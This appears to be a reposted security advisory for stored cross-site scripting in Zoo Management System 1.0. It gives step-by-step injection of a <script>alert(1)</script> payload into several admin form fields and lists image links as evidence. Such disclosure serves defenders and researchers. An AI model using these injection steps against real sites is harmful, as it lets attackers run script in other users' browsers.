zoo management system 1.0 multiple persistent crosssitescripting (xss)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS) # Date: 08/07/2021 # Exploit Author: Subhadip Nag # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Server: XAMPP # Description # Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password) 2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php 3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script> 4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php 5) Stored XSS payload is fired 6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php 7) Edit any Action field with the following payload: <script>alert(1)</script> and Update 8) Go back and again click 'Manage Type Ticket' 9) Stored XSS payload is fired 10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php 11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update 12) Goto: http://localhost/ZMSP/zms/admin/contactus.php 13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update 14) Logout and click 'Back Home' 15) Our XSS payload successful # Image PoC : Reference Image # 1) https://ibb.co/g4hFQDV 2) https://ibb.co/frbpf9c 3) https://ibb.co/NtKrc9C 4) https://ibb.co/cFGWhCz 4) https://ibb.co/CMXmN4f 5) https://ibb.co/C0dV0PC 6) https://ibb.co/4ZW8tb3 7) https://ibb.co/3zgFq9b 8) https://ibb.co/wS8wXj8
Zoo management system 1.0 multiple persistent crosssitescripting (xss) Vulnerability / Exploit Source : Zoo management system 1.0 multiple persistent crosssitescripting (xss)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes